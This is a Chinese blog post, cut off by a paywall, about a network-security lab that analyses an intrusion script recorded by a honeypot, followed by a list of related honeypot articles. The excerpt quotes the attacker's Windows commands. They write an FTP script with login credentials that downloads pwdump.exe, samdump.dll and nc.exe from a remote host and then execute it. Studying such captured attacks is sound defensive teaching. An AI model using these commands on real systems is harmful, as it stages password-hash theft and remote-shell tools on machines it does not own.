蜜罐网络攻击分析实验(网安实验7)

最新推荐文章于 2023-09-07 12:00:00 发布
最新推荐文章于 2023-09-07 12:00:00 发布
阅读量2.7k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33826977/article/details/65629233
版权

来自200.1.x.y(假设的IP的攻击者成功攻陷了一台部署有蜜罐系统的主机200.1.p.q(假设的IP,蜜罐主机记录了入侵过程,入侵数据经提取并经简化处理后的脚本代码如下所示。其中,www.unknown.net是假设的域名。

现在看看所示的一些捕获到的脚本,

           echo werd >> c:\fun

/* 发现不能在c盘中生成一个文件,但是如果切换成d盘就可以

在本机上进行c盘操作也是失败的:

 

在本机的C盘重定向被拒绝访问了。*/

           echo user johna2k > ftpcom

           echo hacker2000 >> ftpcom

           echo get samdump.dll >> ftpcom

           echo get pwdump.exe >> ftpcom

           echo get nc.exe>>ftpcom

           echo quit>>ftpcom

           ftp –s:ftpcom -n 

最低0.47元/天 解锁文章
清楼小刘
关注
专栏目录
[网络安全自学篇] 七十七.恶意代码与APT攻击中的武器(强推Seak老师)
杨秀璋的专栏
05-14 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将带大家学习安天科技集团首席架构师肖新光老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。作者很少会在标题写“强推”的字样,但这篇文章真的值得学习,也希望对您有所帮助。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
论文研究-基于蜜罐的入侵检测系统的设计与实现.pdf
07-23
传统的入侵检测系统无法识别未知的攻击,提出在入侵检测系统中引入蜜罐技术来弥补其不足,并设计和实现了一个基于人工神经网络的入侵检测系统HoneypotIDS。该系统应用感知器学习方法构建FDM检测模型和SDM检测模型两阶段检测模型来对入侵行为进行检测。其中,FDM检测模型用于划分正常类和攻击类,SDM检测模型则在此基础上对一些具体的攻击类型进行识别。最后,设计实验对HoneypotIDS的检测能力进行了测试。实验结果表明,HoneypotIDS对被监控网络中的入侵行为具有较好的检测率和较低的误报率。
蜜罐”配置实验
04-15
蜜罐的配置
利用蜜罐捕捉攻击实验(31)
yyj1781572的博客
03-10 3405
蜜罐技术上是一种对攻击方进行欺骗的技术,通过布置一些诱饵主机、服务器诱使攻击方对它们实施攻击,从而捕获并分析入侵者的攻击行为,推测攻击者意图和动机,从而增强实际系统的安全防护能力。
Hfish蜜罐搭建及简单测试
Mr_atopos的博客
06-15 692
Hfish蜜罐搭建及简单测试
网络安全之蜜罐入门教程(非常详细)从零基础入门到精通,看完这一篇就够了
最新发布
xnxqwzy的博客
09-07 1906
蜜罐是一种主动防御技术,通过主动的暴露一些漏洞、设置一些诱饵来引诱攻击者进行攻击,从而可以对攻击行为进行捕获和分析。是一款开源的基于 Golang 开发的跨平台多功能主动诱导型蜜罐平台,为了企业安全做出了精心的打造。
工业诱捕——蜜罐实操
qq_43369406的博客
03-30 616
蜜罐实践——使用HFish进行诱捕 蜜罐技术是工业诱惑捕捉技术的一种,其作用是通过虚拟出来的一台带有多种漏洞的主机,吸引攻击者主动攻击,以此来吸引攻击流量和样本。本文章主要围绕如果搭建蜜罐及捕获攻击者ip进行讲解。搭建环境:windows10,使用软件HFish。 蜜罐搭建 蜜罐搭建 打开Telnet来判断端口打开与否 Telnet是一种服务,工作于应用层。Telnet命令通常用于远程登陆,为用户提供了在自己终端电脑上完成远程主机工作的能力。 我们在控制面板中打开Telnet,路径为控制面板-程序--
Ubuntu下蜜罐系统HFish部署及功能实测分析
5. 功能实测:通过模拟网络攻击或实际的外部网络流量,观察HFish蜜罐系统的行为和记录日志,验证蜜罐是否能够有效吸引攻击者并记录攻击数据。 6. 攻击数据解析:对于HFish收集到的数据进行分析,理解攻击者的行为...
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
杨秀璋的专栏
09-15 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。本篇文章,作者将分享两篇论文,机器学习是如何运用到恶意代码攻击中的,并谈谈自己的理解,后续深入研究尝试分享相关实验,目前还是小白一只。基础性文章,希望对初学者有帮助,大神请飘过,谢谢各位看官!
iptables配置和honeyd配置实验报告
06-05
iptables配置实现内外网防火墙,允许内网访问外网http,https,ftp等服务,禁止外网直接访问内网主机,honeyd在ubuntu下的使用,部署简单的蜜罐系统,实现记录攻击者扫描主机及访问web信息及时间
CNCERT安全报告中的恶意域名收集整理的黑名单
06-25
从CNCERT主页上抠下来的恶意域名 2012年3月12日起至2012年6月10日 1000多个恶意域名 原报告中指出这些域名与木马,仿冒和僵尸程序有关 这些域名每周出一次,原文是: “依据《中国互联网域名管理办法》和《木马和僵尸网络监测与处置机制》等相关法律法规的规定,本周 ANVA 在中国电信等基础电信运营企业以及第一主机、东南融通、广东7金万邦、互易科技、花生壳、江苏邦宁、上海有孚、时代互联、万网、西部数码、西维数码、希网、厦门易名、新网互联、新网数码等域名注册服务机构的配合和支持下,并通过与境外域名注册商和国际安全组织的协作机制,对 155 个境内外参与传播网络病毒或仿冒网站的恶意域名或服务器主机 IP 采取了处置措施。” 这里只是收集 版权什么的还是归它CNCERT吧
蜜罐技术-威胁狩猎
VetinaLu的博客
11-09 533
蜜罐技术手段
系统蜜罐部署实验
coderge's CSDN Blog.
01-08 6252
实验目的 掌握 Defnet部署蜜罐服务的方法。 掌握利用 Defnet 蜜罐进行监测的方法。 实验原理 1. 蜜罐技术  蜜罐技术本质上是一种对攻击方进行欺骗的技术,通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,从而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机,能够让防御方清晰地了解他们所面对的安全威胁,并通过技术和管理手段来增强...
蜜罐,在行动中捕获黑客的陷阱
金色的小蜜蜂
05-09 1866
蜜罐,在行动中捕获黑客的陷阱 蜜罐是IT专业人员奠定了恶意黑客,希望他们会在提供有用的情报的方式与之交互陷阱。这是IT中最古老的安全措施之一,但要注意:即使在孤立的系统上,将黑客吸引到您的网络上也是一种危险的游戏。蜜罐是一种计算机或计算机系统,旨在模仿可能的网络攻击目标。 通常情况下,蜜罐会被故意配置已知的漏洞,以便为攻击者制定更具诱惑力或明显的目标。蜜罐不会包含生产数据或参与您网络上的合法流量,...
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1262
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
【网络安全】蜜罐部署实战&DecoyMini攻击诱捕
九芒星的博客
07-25 5533
文章到底在讲什么?省流:实战演示,教你如何伪造一个钓鱼网站,并通过网站获取对方信息
蜜罐系统理解的总结
我回来了,就要有回来的意义
01-25 8055
蜜罐是一台无人使用但却被严密监控的网络主机,它包含虚假的高价值资源和一些漏洞,以此吸引入侵者攻击主机。并且在被入侵的过程中,实时记录和审计攻击者的攻击流量、行为和数据。以此了解攻击者的方式、手段和目的,并且完成对攻击溯源、取证等进一步的工作。
【网络安全之——蜜罐
m0_37922995的博客
03-14 1万+
蜜罐是一种主动防御技术,通过主动的暴露一些漏洞、设置一些诱饵来引诱攻击者进行攻击,从而可以对攻击行为进行捕获和分析
构建与分析网络蜜罐:主动防御与取证策略
网络蜜罐的核心原理是利用漏洞和伪装,模拟真实的系统,诱使攻击者发起攻击,然后记录并分析这些行为,以便于识别入侵者的意图、手段和路径,从而作为网络安全防护策略的重要补充。作为一种主动防御技术,蜜罐并非...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值